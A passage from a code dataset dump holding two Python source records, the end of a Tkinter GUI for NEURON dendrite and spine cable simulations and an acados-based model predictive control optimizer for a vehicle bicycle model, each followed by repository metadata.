spines)\n\t\tfor spine in h.allsec():\n\t\t\tif 'spine' in spine.name():\n\t\t\t\th.delete_section(sec=spine)\n\n\tif (mode=='update' and Simulator.spines_exist) or (mode=='button_callback' and GUI.Buttons['AddSpines']['text']=='Add Spines'):\n\t\tSimulator.spine_heads, Simulator.spine_necks = PutSpines('cable', Simulator.dend, Simulator.exc_locs, \n\t\t\t\t\t\t\t\t\t\t\t\t\tneck_diam = float(GUI.Entries['spines']['neck_diam']['Var'].get()), \n\t\t\t\t\t\t\t\t\t\t\t\t\tneck_len = float(GUI.Entries['spines']['neck_L']['Var'].get()), \n\t\t\t\t\t\t\t\t\t\t\t\t\thead_radius = float(GUI.Entries['spines']['head_radius']['Var'].get()), \n\t\t\t\t\t\t\t\t\t\t\t\t\tRa = float(GUI.Entries['spines']['neck_Ra']['Var'].get()), \n\t\t\t\t\t\t\t\t\t\t\t\t\tcm=Simulator.dend.cm, \n\t\t\t\t\t\t\t\t\t\t\t\t\te_pas = Simulator.dend.e_pas, \n\t\t\t\t\t\t\t\t\t\t\t\t\tg_pas=4.6716e-5)\n\t\tSimulator.spines_exist = True\n\t\tGUI.Buttons['AddSpines']['text'] = 'Remove Spines'\n\t\th.define_shape()\n\n\t\t# Unlock spine-related radio buttons\n\t\tGUI.RadioButtons['syn_loc']['Buttons'][0].config(state='normal')\n\t\tGUI.RadioButtons['volt_loc']['Buttons'][0].config(state='normal')\n\n\telif mode=='button_callback' and GUI.Buttons['AddSpines']['text']=='Remove Spines':\n\n\t\tSimulator.spine_heads, Simulator.spine_necks = [], []\n\t\tSimulator.spines_exist = False\n\n\t\tGUI.Buttons['AddSpines']['text'] = 'Add Spines'\n\n\t\t# Make sure user can't put synapses on non-existing spines\n\t\tGUI.RadioButtons['syn_loc']['Var'].set(2)\n\t\tGUI.RadioButtons['syn_loc']['Buttons'][0].config(state='disabled')\n\t\tGUI.RadioButtons['volt_loc']['Var'].set(2)\n\t\tGUI.RadioButtons['volt_loc']['Buttons'][0].config(state='disabled')\n\n\n\tSimulator.PlaceSynapses('exc')\n\tGUI.DrawSections(colors)\n\tUpdatePresentedValues(GUI.ChangingLabels)\n\ndef AddSoma_callback():\n\n\ts = ttk.Style()\n\ts.configure('Gray.TEntry', background='gray')\n\n\tif GUI.Buttons['AddSoma']['text'] == 'Add Soma':\n\n\t\tsoma_size = float(GUI.Entries['soma']['soma.diam']['Var'].get())\n\t\tsoma_cm = float(GUI.Entries['soma']['soma.cm']['Var'].get())\n\t\tSimulator.CreateCompartment('soma', \n\t\t\t\t\t\t\t\t\tL = soma_size, \n\t\t\t\t\t\t\t\t\tdiam = soma_size, \n\t\t\t\t\t\t\t\t\tRa = 110, \n\t\t\t\t\t\t\t\t\te_pas = h.v_init, \n\t\t\t\t\t\t\t\t\tg_pas = 1.0 / 1500.0, \n\t\t\t\t\t\t\t\t\tnseg = int(soma_size) * 5, \n\t\t\t\t\t\t\t\t\tcm = soma_cm)\n\t\t\n\t\th.disconnect(sec=Simulator.soma)\n\t\tSimulator.dend.connect(Simulator.soma, 1, 0) # Disconnect from parents if exist (following weird bug in which soma was created as child of last created section (spine head))\n\t\th.define_shape() # !Explain this\n\n\t\tGUI.Buttons['AddSoma']['text'] = 'Remove Soma' #!Toggle soma function inside GUI\n\t\tGUI.RadioButtons['volt_loc']['Buttons'][2].config(state='normal')\n\n\telif GUI.Buttons['AddSoma']['text'] == 'Remove Soma':\n\t\th.delete_section(sec=Simulator.soma)\n\t\tSimulator.soma = None\n\t\tGUI.Buttons['AddSoma']['text'] = 'Add Soma'\n\n\t\tGUI.RadioButtons['volt_loc']['Var'].set(2)\n\t\tGUI.RadioButtons['volt_loc']['Buttons'][2].config(state='disabled')\n\n\tGUI.DrawSections(colors)\n\tUpdatePresentedValues(GUI.ChangingLabels)\n\ndef RunSim_callback():\n\t# !Insert most of this to Simulator\n\tfor button in GUI.Buttons:\n\t\tif button is not 'Reset':\n\t\t\tGUI.Buttons[button].config(state='disabled')\n\n\tSimulator.RunSim()\n\n\tVoltRadio_callback([], [], [])\n\ndef Reset_callback():\n\tfor button in GUI.Buttons:\n\t\tGUI.Buttons[button].config(state='normal')\n\n\tfreeze_plots = GUI.CheckBoxes['freeze_plots']['Var'].get()\n\tif not freeze_plots:\n\t\tGUI.Figures['volt']['ax'].clear()\n\t\tGUI.Figures['volt']['graph'].draw()\n\n\tSimulator.vectors['t']\t\t\t= []\n\tSimulator.vectors['shaft_v']\t= []\n\tSimulator.vectors['spine_v']\t= []\n\tSimulator.vectors['soma_v']\t\t= []\n\ndef VoltRadio_callback(a, b, c):\n\t'''\n\tCallback to radio button indicating location of voltage traces to be shown in figure.\n\tInputs are eventdata (automatically generated by Tkinter).\n\t'''\n\tax = GUI.Figures['volt']['ax']\n\tgraph = GUI.Figures['volt']['graph']\n\tvar = GUI.RadioButtons['volt_loc']['Var']\n\n\tfreeze_plots = GUI.CheckBoxes['freeze_plots']['Var'].get()\n\tif not freeze_plots:\n\t\tax.clear()\n\n\tif var.get() == 1:\n\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['spine_v'], color=colors['spine_head'])\n\t\tv_where = 'Spine'\n\t\n\telif var.get() == 2:\n\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['shaft_v'], color=colors['dend'])\n\t\tv_where = 'Shaft'\n\t\n\telif var.get() == 3:\n\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['soma_v'], color=colors['soma'])\n\t\tv_where = 'Soma'\n\t\n\telif var.get() == 4:\n\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['shaft_v'], color=colors['dend'], label='Shaft')\n\t\t\n\t\tif len(Simulator.vectors['spine_v']) > 0:\n\t\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['spine_v'], color=colors['spine_head'], label='Spine Head')\n\t\t\n\t\tif len(Simulator.vectors['soma_v']) > 0:\n\t\t\tax.plot(Simulator.vectors['t'], Simulator.vectors['soma_v'], color=colors['soma'], label='Soma')\n\n\t\tax.legend()\n\t\tv_where = 'All Recorded Locations'\n\n\tax.set_title('Voltage Trace in %s'%v_where)\n\tgraph.draw()\n\ndef UpdateMorph_callback():\n\t\"\"\"\n\tRun an update call on all GUI paraeters and functions. Including:\n\t\t- Updating parameters taken from entries\n\t\t- Updating synapse locations\n\t\t- Placing synapses according to updated locations\n\t\t- Re-drawing morphology\n\t\t- Updating calculated values presented to user\n\t\"\"\"\n\n\tUpdateEntryParams(Simulator, GUI)\n\n\t# Update spine locations\n\tUpdateSynLocs()\t\n\tAddSpines_callback(mode='update')\n\tSimulator.PlaceSynapses('exc')\n\tSimulator.PlaceSynapses('inh')\n\tGUI.DrawSections(colors)\n\n\tUpdatePresentedValues(GUI.ChangingLabels)\n\tUpdateErrorLabel(GUI.ChangingLabels['errors'])\n\ndef EntryTracking_callback(a, b, c):\n\t'''\n\tFunction called whenever an entry value is changed by user. \n\tInputs are eventdata (automatically generated by Tkinter).\n\t'''\n\n\tif not GUI.suppress_entry_callback:\n\t\tUpdateErrorLabel(GUI.ChangingLabels['errors'], \\\n\t\t\t'Warning: You changed something! Press \\'Update Morphology\\' to implement changes before running simulation')\n\n# ================================================ Initialize Parameters =================================================\n#! Add logs\ncolors = {\t'dend': 'black', \n\t\t\t'soma': 'lightblue', \n\t\t\t'spine_neck': 'royalblue', \n\t\t\t'spine_head': 'darkblue'}\n\n# !Get this inside Simulator and if arguments not given, default to it\n# All elements in this dictionary will appear as entries in GUI (separate keys for separate blocks)\nUserParamDict = {\n'simulation': OrderedDict([\n\t('dend.L', [u'Branch Length [\\u03BCm]', 80]), \n\t('dend.diam', [u'Branch Diameter [\\u03BCm]', 0.26]),\n\t('dend.cm', [u'Branch Capacitance [\\u03BCF/cm\\u00B2]', 1]),\n\t('start_syns', [u'Synapse Start [\\u03BCm]', 4]), \t\t\n\t('dEI', ['dt(E, I) [ms]', 10]),\n\t('h.v_init', ['Resting Potential [mV]', -75]),\n\t('h.tstop', ['Simulation Time', 250])\n\t]),\n'synapses': {'exc': OrderedDict([\n\t('exc_dense', ['Exc. Density', 0.58]),\n\t('exc_g_max', ['Exc. g_max', 0.4]),\n\t('exc_dist', ['Exc. Distribution', 'Uniform']),\n\t]),\n'inh': OrderedDict([\n\t('inh_dense', ['Inh. Density', 0.2]), \n\t('inh_g_max', ['Inh. gmax', 0.5]),\n\t('inh_dist', ['Inh. Distribution', 'Uniform'])\n\t])},\n'spines': OrderedDict([\n\t('neck_diam', [u'Neck diam [\\u03BCm]', 0.0394]),\n\t('neck_L', [u'Neck L [\\u03BCm]', 1]),\n\t('neck_Ra', [u'Neck Ra (per unit area) [\\u03A9-cm]', 50]),\n\t('head_radius', [u'Head radius [\\u03BCm]', 0.297])\t\n\t]),\n'soma': OrderedDict([\n\t('soma.diam', [u'diam [\\u03BCm]', 10]),\n\t('soma.cm', [u'Cm [\\u03BCF/cm\\u00B2]', 1])\t\n\t])\n}\n\nSimInitDict = {}\nSimInitDict.update(UserParamDict['simulation'])\nSimInitDict.update(UserParamDict['synapses']['exc'])\nSimInitDict.update(UserParamDict['synapses']['inh'])\n \nGUI = CableGUI('Cable Simulation', (1500, 750), 'white') # Main window object, from class CableGUI\nSimulator = Simulators(SimInitDict, GUI)\t\t\t\t # Simulator object, from class Simulators\n\nSimulator.CreateCompartment('dend', \n\tL = UserParamDict['simulation']['dend.L'][1], \n\tdiam = UserParamDict['simulation']['dend.diam'][1], \n\tcm = UserParamDict['simulation']['dend.cm'][1],\n\tRa = 150, \n\te_pas = UserParamDict['simulation']['h.v_init'][1], \n\tg_pas = 1.0 / 1500.0, \n\tnseg = int(UserParamDict['simulation']['dend.L'][1]) * 5)\n\n# ================================================ Create GUI - Main Window (root) =================================================\t\nGUI.AddLabel(GUI, text='Cable Simulation GUI', font=('TkDefaultFont', 30), foreground='darkred', background='white', sticky='W')\n\nGUI.AddButton(GUI, 'RunSim', 'Run Simulation', command=RunSim_callback, row=1, column=0)\nGUI.AddButton(GUI, 'Reset', 'Reset Simulation', command=Reset_callback, row=2, column=0)\nGUI.AddButton(GUI, 'UpdateMorph', 'Update Morphology', command=UpdateMorph_callback, row=1, column=1)\n\nGUI.AddTab('param_tab', 'Parameter Set', rowspan=3, columnspan=10)\nGUI.AddTab('fig_tab', 'Figures')\n\n# ================================================ Param Tab Design =================================================\n# Initialize parameters\nparams_col, image_row_span, AddColumn = 0, len(UserParamDict['simulation']) + 1, 5\nimage_dim, reported_dim = (1, 4), (2, 7)\n\n# Simulation- and synapse-related user entries\nGUI.AddEntries(GUI.Tabs['param_tab'], 'simulation', UserParamDict['simulation'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelColumn=params_col, entryTitle='Set Simulation Parameters')\n\n\nGUI.AddRadioButton(GUI.Tabs['param_tab'], 'syn_loc', [\"Synapses on Spines\", \"Synapses on Shaft\"], \n\t\t\t\t\t\tcommand=EntryTracking_callback, default_val=2, sticky='WE', column=0)\n\nGUI.RadioButtons['syn_loc']['Buttons'][0].config(state='disabled')\n\nGUI.AddEntries(GUI.Tabs['param_tab'], 'synapse_exc', UserParamDict['synapses']['exc'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelColumn=params_col, entryTitle='Exc. Synapses')\n\nGUI.AddEntries(GUI.Tabs['param_tab'], 'synapse_inh', UserParamDict['synapses']['inh'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelColumn=params_col, entryTitle='Inh. Synapses')\n\n# Morphology figure\nGUI.PutFigure(GUI.Tabs['param_tab'], 'morph', xlabel='X', ylabel='Y', facecolor='darkgray', \n\t\t\t\t\t\trow=image_dim[0], column=image_dim[1], rowspan=image_row_span, columnspan=3, padx=45)\n\n# Add compartments buttons\nAddSpines_row = image_dim[0] + image_row_span\nGUI.AddButton(GUI.Tabs['param_tab'], 'AddSpines', 'Add Spines', \n\t\t\t\t\t\tcommand=AddSpines_callback, row=AddSpines_row, column=AddColumn)\nGUI.AddEntries(GUI.Tabs['param_tab'], 'spines', UserParamDict['spines'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelRow=AddSpines_row, labelColumn=AddColumn+1)\nSimulator.spines_exist = False\n\nprint('!!! Make actual spine params change with entry!!!')\n\nAddSoma_row = AddSpines_row + 1 + len(GUI.Entries['spines'])\nGUI.AddButton(GUI.Tabs['param_tab'], 'AddSoma', 'Add Soma', \n\t\t\t\t\t\tcommand=AddSoma_callback, row=AddSoma_row, column=AddColumn)\nGUI.AddEntries(GUI.Tabs['param_tab'], 'soma', UserParamDict['soma'], \n\t\t\t\t\t\tcommand=EntryTracking_callback, labelRow=AddSoma_row, labelColumn=AddColumn+1)\n\n# Add text presented to user\nGUI.AddLabel(GUI.Tabs['param_tab'], text='Calculated Values', font=15, row=reported_dim[0], column=reported_dim[1])\nfor i, name in enumerate(['lambda', 'Ri', 'n_exc', 'n_inh']):\n\tGUI.AddLabel(GUI.Tabs['param_tab'], varName=name, font=15, fg='darkgreen',\n\t\t\t\t\t\trow=reported_dim[0]+i+1, column=reported_dim[1], padx=5, sticky='We')\nUpdatePresentedValues(GUI.ChangingLabels)\n\nGUI.AddLabel(GUI.Tabs['param_tab'], varName='errors', font=15, column=0, columnspan=10, padx=5, sticky='WE')\nUpdateErrorLabel(GUI.ChangingLabels['errors'], None)\n\n# ================================================ Figure Tab Design =================================================\nGUI.PutFigure(GUI.Tabs['fig_tab'], 'volt', xlabel='T (ms)', ylabel='Voltage (mV)', facecolor = 'gray', row=1)\nGUI.AddCheckbox(GUI.Tabs['fig_tab'], \"Freeze Plots\", 'freeze_plots', False, sticky='W') \n\nGUI.AddRadioButton(GUI.Tabs['fig_tab'], 'volt_loc', \n\t[\"Show Spine Voltage\", \"Show Shaft Voltage\", \"Show Soma Voltage\", \"Show Overlay of Voltages\"], \n\tcommand=VoltRadio_callback, default_val=2, sticky='WE')\nGUI.RadioButtons['volt_loc']['Buttons'][0].config(state='disabled')\nGUI.RadioButtons['volt_loc']['Buttons'][2].config(state='disabled')\n\n# ================================================ Make Updates =================================================\nUpdateSynLocs()\nSimulator.PlaceSynapses('exc')\nSimulator.PlaceSynapses('inh')\nGUI.DrawSections(colors) \n\nprint('*****\\nTO DO:\\n \\\n\t- After defaulting to uniform locations change exc_dense to \\'Uniform\\'\\\n\t- Add option for changing spine neck resistance, length, diam and head size!\\n\\\n\t- In freeze plots think of option to go freeze in all compartments (maybe put on different axes and show one each time if possible?)\\n\\\n\t- IMPORTANT: After updating entry params make sure real values update!\\n*****')\n\n", "repo_name": "hadasman/SimulationGUI_new", "sub_path": "MainScript.py", "file_name": "MainScript.py", "file_ext": "py", "file_size_in_byte": 16637, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.chdir", "line_number": 6, "usage_type": "call"}, {"api_name": "matplotlib.use", "line_number": 8, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 10, "usage_type": "call"}, {"api_name": "neuron.h.allsec", "line_number": 113, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 113, "usage_type": "name"}, {"api_name": "neuron.h.delete_section", "line_number": 115, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 115, "usage_type": "name"}, {"api_name": "neuron.h.define_shape", "line_number": 128, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 128, "usage_type": "name"}, {"api_name": "neuron.h.v_init", "line_number": 165, "usage_type": "attribute"}, {"api_name": "neuron.h", "line_number": 165, "usage_type": "name"}, {"api_name": "neuron.h.disconnect", "line_number": 170, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 170, "usage_type": "name"}, {"api_name": "neuron.h.define_shape", "line_number": 172, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 172, "usage_type": "name"}, {"api_name": "neuron.h.delete_section", "line_number": 178, "usage_type": "call"}, {"api_name": "neuron.h", "line_number": 178, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 294, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 303, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 308, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 313, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "23963979260", "text": "\"\"\" Implementation of the nonlinear optimizer for the data-augmented MPC.\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation, either version 3 of the License, or (at your option) any later\nversion.\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\nYou should have received a copy of the GNU General Public License along with\nthis program. If not, see .\n\"\"\"\n\n\nimport os\nimport sys\nimport shutil\nimport casadi as cs\nimport numpy as np\nfrom copy import copy\nfrom acados_template import AcadosOcp, AcadosOcpSolver, AcadosModel\nfrom ad_mpc.ad_3d import AD3D\nfrom model_fitting.gp import GPEnsemble\nfrom utils.utils import skew_symmetric, v_dot_q, safe_mkdir_recursive, quaternion_inverse\n# from utils.quad_3d_opt_utils import discretize_dynamics_and_cost\n\n\nclass AD3DOptimizer:\n def __init__(self, ad, t_horizon=1, n_nodes=20, q_cost=None, r_cost=None, model_name=\"ad_3d_acados_mpc\", solver_options=None):\n \"\"\"\n :param quad: ad object\n :type quad: AD3D\n :param t_horizon: time horizon for MPC optimization\n :param n_nodes: number of optimization nodes until time horizon\n :param q_cost: diagonal of Q matrix for LQR cost of MPC cost function. Must be a numpy array of length 12.\n :param r_cost: diagonal of R matrix for LQR cost of MPC cost function. Must be a numpy array of length 4.\n :param solver_options: Optional set of extra options dictionary for solvers. \n \"\"\"\n\n # Weighted squared error loss function q = (p_xyz, a_xyz, v_xyz, r_xyz), r = (u1, u2, u3, u4)\n if q_cost is None:\n q_cost = np.array([1.0, 1.0, 10., 5.0])\n if r_cost is None:\n r_cost = np.array([10.0, 100.0]) \n\n self.T = t_horizon # Time horizon\n self.N = n_nodes # number of control nodes within horizon\n\n\n self.ad = ad\n \n self.steering_min = ad.steering_min\n self.steering_max = ad.steering_max\n self.acc_min = ad.acc_min\n self.acc_max = ad.acc_max\n\n # Declare model variables\n self.p = cs.MX.sym('p', 2) # position\n self.s = cs.MX.sym('s', 1) # psi \n self.v = cs.MX.sym('v', 1) # velocity \n\n # Full state vector (4-dimensional)\n self.x = cs.vertcat(self.p, self.s, self.v)\n self.state_dim = 4\n\n # Control input vector\n u1 = cs.MX.sym('u1')\n u2 = cs.MX.sym('u2')\n \n self.u = cs.vertcat(u1, u2)\n\n # Nominal model equations symbolic function (no GP)\n self.ad_xdot_nominal = self.ad_dynamics()\n\n # Initialize objective function, 0 target state and integration equations\n self.L = None\n self.target = None\n\n\n # Build full model. Will have 4 variables. self.dyn_x contains the symbolic variable that\n # should be used to evaluate the dynamics function. It corresponds to self.x if there are no GP's, or\n # self.x_with_gp otherwise\n acados_models, nominal_with_gp = self.acados_setup_model(\n self.ad_xdot_nominal(x=self.x, u=self.u)['x_dot'], model_name)\n\n \n # Convert dynamics variables to functions of the state and input vectors\n self.ad_xdot = {}\n for dyn_model_idx in nominal_with_gp.keys():\n dyn = nominal_with_gp[dyn_model_idx]\n self.ad_xdot[dyn_model_idx] = cs.Function('x_dot', [self.x, self.u], [dyn], ['x', 'u'], ['x_dot'])\n\n # ### Setup and compile Acados OCP solvers ### #\n self.acados_ocp_solver = {}\n\n \n # Ensure current working directory is current folder\n os.chdir(os.path.dirname(os.path.realpath(__file__)))\n self.acados_models_dir = '../../acados_models'\n safe_mkdir_recursive(os.path.join(os.getcwd(), self.acados_models_dir))\n\n for key, key_model in zip(acados_models.keys(), acados_models.values()):\n nx = key_model.x.size()[0]\n nu = key_model.u.size()[0]\n ny = nx + nu\n n_param = key_model.p.size()[0] if isinstance(key_model.p, cs.MX) else 0\n\n acados_source_path = os.environ['ACADOS_SOURCE_DIR']\n sys.path.insert(0, '../common')\n\n # Create OCP object to formulate the optimization\n ocp = AcadosOcp()\n ocp.acados_include_path = acados_source_path + '/include'\n ocp.acados_lib_path = acados_source_path + '/lib'\n ocp.model = key_model\n ocp.dims.N = self.N\n ocp.solver_options.tf = t_horizon\n\n # Initialize parameters\n ocp.dims.np = n_param\n ocp.parameter_values = np.zeros(n_param)\n\n ocp.cost.cost_type = 'LINEAR_LS'\n ocp.cost.cost_type_e = 'LINEAR_LS'\n\n ocp.cost.W = np.diag(np.concatenate((q_cost, r_cost)))\n ocp.cost.W_e = np.diag(q_cost)\n terminal_cost = 0 if solver_options is None or not solver_options[\"terminal_cost\"] else 1\n ocp.cost.W_e *= terminal_cost\n\n ocp.cost.Vx = np.zeros((ny, nx))\n ocp.cost.Vx[:nx, :nx] = np.eye(nx)\n ocp.cost.Vu = np.zeros((ny, nu))\n ocp.cost.Vu[-2:, -2:] = np.eye(nu)\n\n ocp.cost.Vx_e = np.eye(nx)\n\n # Initial reference trajectory (will be overwritten)\n x_ref = np.zeros(nx)\n ocp.cost.yref = np.concatenate((x_ref, np.array([0.0, 0.0])))\n ocp.cost.yref_e = x_ref\n\n # Initial state (will be overwritten)\n ocp.constraints.x0 = x_ref\n\n # Set constraints\n ocp.constraints.lbu = np.array([self.acc_min, self.steering_min])\n ocp.constraints.ubu = np.array([self.acc_max, self.steering_max])\n ocp.constraints.idxbu = np.array([0, 1])\n\n # Solver options\n ocp.solver_options.qp_solver = 'FULL_CONDENSING_HPIPM'\n ocp.solver_options.hessian_approx = 'GAUSS_NEWTON'\n ocp.solver_options.integrator_type = 'ERK'\n ocp.solver_options.print_level = 0\n ocp.solver_options.nlp_solver_type = 'SQP_RTI' if solver_options is None else solver_options[\"solver_type\"]\n\n # Compile acados OCP solver if necessary\n json_file = os.path.join(self.acados_models_dir, key_model.name + '_acados_ocp.json')\n self.acados_ocp_solver[key] = AcadosOcpSolver(ocp, json_file=json_file)\n\n def clear_acados_model(self):\n \"\"\"\n Removes previous stored acados models to avoid name conflicts.\n \"\"\"\n\n json_file = os.path.join(self.acados_models_dir, 'acados_ocp.json')\n if os.path.exists(json_file):\n os.remove(os.path.join(os.getcwd(), json_file))\n compiled_model_dir = os.path.join(os.getcwd(), 'c_generated_code')\n if os.path.exists(compiled_model_dir):\n shutil.rmtree(compiled_model_dir)\n\n \n def acados_setup_model(self, nominal, model_name):\n \"\"\"\n Builds an Acados symbolic models using CasADi expressions.\n :param model_name: name for the acados model. Must be different from previously used names or there may be\n problems loading the right model.\n :param nominal: CasADi symbolic nominal model of the AD: f(self.x, self.u) = x_dot, dimensions 4x1.\n :return: Returns a total of three outputs, where m is the number of GP's in the GP ensemble, or 1 if no GP:\n - A dictionary of m AcadosModel of the GP-augmented AD\n - A dictionary of m CasADi symbolic nominal dynamics equations with GP mean value augmentations (if with GP)\n :rtype: dict, dict, cs.MX\n \"\"\"\n def fill_in_acados_model(x, u, p, dynamics, name):\n\n x_dot = cs.MX.sym('x_dot', dynamics.shape)\n f_impl = x_dot - dynamics\n\n # Dynamics model\n model = AcadosModel()\n model.f_expl_expr = dynamics\n model.f_impl_expr = f_impl\n model.x = x\n model.xdot = x_dot\n model.u = u\n model.p = p\n model.name = name\n\n return model\n\n acados_models = {}\n dynamics_equations = {}\n\n\n # No available GP so return nominal dynamics\n dynamics_equations[0] = nominal\n\n x_ = self.x\n dynamics_ = nominal\n\n acados_models[0] = fill_in_acados_model(x=x_, u=self.u, p=[], dynamics=dynamics_, name=model_name)\n\n return acados_models, dynamics_equations\n\n def ad_dynamics(self):\n \"\"\"\n Symbolic dynamics of the 2D AD model. The state consists on: [p_xy, psi, speed]^T.\n The input of the system is: [u_1, u_2], i.e. acceleration & delta(steering angle)\n\n :return: CasADi function that computes the analytical differential state dynamics of the quadrotor model.\n Inputs: 'x' state of AD (4x1) and 'u' control input (2x1). Output: differential state vector 'x_dot'\n (4x1)\n \"\"\"\n x_dot = cs.vertcat(self.p_dynamics(), self.s_dynamics(), self.v_dynamics())\n return cs.Function('x_dot', [self.x[:4], self.u], [x_dot], ['x', 'u'], ['x_dot'])\n\n def p_dynamics(self):\n beta = cs.atan(self.ad.L_R / (self.ad.L_F + self.ad.L_R) * cs.tan(self.u[1])) \n return cs.vertcat(self.v * cs.cos(self.s + beta), self.v * cs.sin(self.s+beta))\n\n def s_dynamics(self):\n beta = cs.atan(self.ad.L_R / (self.ad.L_F + self.ad.L_R) * cs.tan(self.u[1])) \n return self.v/self.ad.L_R*cs.sin(beta)\n\n def v_dynamics(self): \n return self.u[0] \n\n def set_reference_state(self, x_target=None, u_target=None):\n \"\"\"\n Sets the target state and pre-computes the integration dynamics with cost equations\n :param x_target: 4-dimensional target state (p_xyz, a_wxyz, v_xyz, r_xyz)\n :param u_target: 2-dimensional target control input vector (u_1, u_2, u_3, u_4)\n \"\"\"\n if x_target is None:\n x_target = [[0, 0, 0, 0]]\n return\n if u_target is None:\n u_target = [0, 0]\n return\n # Set new target state\n self.target = copy(x_target)\n gp_ind = 0\n ref = np.concatenate((x_target, u_target))\n x_target = np.array(x_target)\n for j in range(self.N):\n self.acados_ocp_solver[gp_ind].set(j, \"yref\", ref)\n self.acados_ocp_solver[gp_ind].set(self.N, \"yref\", x_target)\n return gp_ind\n\n def set_reference_trajectory(self, x_target, u_target):\n \"\"\"\n Sets the reference trajectory and pre-computes the cost equations for each point in the reference sequence.\n :param x_target: Nx4-dimensional reference trajectory (p_xy, psi, vel). It is passed in the\n form of a 3-length list, where the first element is a Nx2 numpy array referring to the position targets, the\n second is a Nx1 array referring to the yaw, one Nx1 arrays for the speed.\n :param u_target: Nx2-dimensional target control input vector (u1, u2)\n \"\"\"\n ##########################################################################################\n # if u_target is not None:\n # assert x_target[0].shape[0] == (u_target.shape[0] + 1) or x_target[0].shape[0] == u_target.shape[0]\n\n # # If not enough states in target sequence, append last state until required length is met\n while x_target.shape[0] < self.N+1:\n x_target = np.vstack((x_target,x_target[-1,:]))\n u_target = np.vstack((u_target,u_target[-1,:]))\n \n # x_target = [np.concatenate(x_target, x_target[-1,:], 0) for x in x_target]\n # if u_target is not None:\n # u_target = np.concatenate((u_target, np.expand_dims(u_target[-1, :], 0)), 0)\n\n # stacked_x_target = np.concatenate([x for x in x_target], 1)\n ##########################################################################################\n gp_ind = 0\n # tmp = x_target[:,2] \n # np.place(tmp,tmp < -3, tmp+2*np.pi)\n # x_target[:,2] = tmp\n self.target = copy(x_target) \n print(x_target) \n stacked_x_target = x_target \n \n \n for j in range(self.N):\n ref = stacked_x_target[j, :]\n ref = np.concatenate((ref, u_target[j, :]))\n self.acados_ocp_solver[gp_ind].set(j, \"yref\", ref)\n # the last MPC node has only a state reference but no input reference\n self.acados_ocp_solver[gp_ind].set(self.N, \"yref\", stacked_x_target[self.N, :])\n return gp_ind\n\n \n def run_optimization(self, initial_state=None, use_model=0, return_x=False, gp_regression_state=None):\n \"\"\"\n Optimizes a trajectory to reach the pre-set target state, starting from the input initial state, that minimizes\n the quadratic cost function and respects the constraints of the system\n\n :param initial_state: 13-element list of the initial state. If None, 0 state will be used\n :param use_model: integer, select which model to use from the available options.\n :param return_x: bool, whether to also return the optimized sequence of states alongside with the controls.\n :param gp_regression_state: 13-element list of state for GP prediction. If None, initial_state will be used.\n :return: optimized control input sequence (flattened)\n \"\"\"\n\n if initial_state is None:\n initial_state = [0.0, 0.0] + [0.0]+ [0.0]\n\n # Set initial state. Add gp state if needed\n x_init = initial_state\n x_init = np.stack(x_init)\n x_init = x_init.squeeze()\n\n # Set initial condition, equality constraint\n self.acados_ocp_solver[use_model].set(0, 'lbx', x_init)\n self.acados_ocp_solver[use_model].set(0, 'ubx', x_init)\n \n # Solve OCPacados_ocp_solver\n self.acados_ocp_solver[use_model].solve()\n\n # Get u\n w_opt_acados = np.ndarray((self.N, 2))\n x_opt_acados = np.ndarray((self.N + 1, len(x_init)))\n x_opt_acados[0, :] = self.acados_ocp_solver[use_model].get(0, \"x\")\n for i in range(self.N):\n w_opt_acados[i, :] = self.acados_ocp_solver[use_model].get(i, \"u\")\n x_opt_acados[i + 1, :] = self.acados_ocp_solver[use_model].get(i + 1, \"x\")\n\n w_opt_acados = np.reshape(w_opt_acados, (-1))\n return w_opt_acados if not return_x else (w_opt_acados, x_opt_acados)\n", "repo_name": "amilearning/hmclmobil", "sub_path": "data_driven_mpc/ros_gp_mpc/src/ad_mpc/ad_3d_optimizer.py", "file_name": "ad_3d_optimizer.py", "file_ext": "py", "file_size_in_byte": 14684, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "casadi.MX.sym", "line_number": 58, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 58, "usage_type": "attribute"}, {"api_name": "casadi.MX.sym", "line_number": 59, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 59, "usage_type": "attribute"}, {"api_name": "casadi.MX.sym", "line_number": 60, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 60, "usage_type": "attribute"}, {"api_name": "casadi.vertcat", "line_number": 63, "usage_type": "call"}, {"api_name": "casadi.MX.sym", "line_number": 67, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 67, "usage_type": "attribute"}, {"api_name": "casadi.MX.sym", "line_number": 68, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 68, "usage_type": "attribute"}, {"api_name": "casadi.vertcat", "line_number": 70, "usage_type": "call"}, {"api_name": "casadi.Function", "line_number": 91, "usage_type": "call"}, {"api_name": "os.chdir", 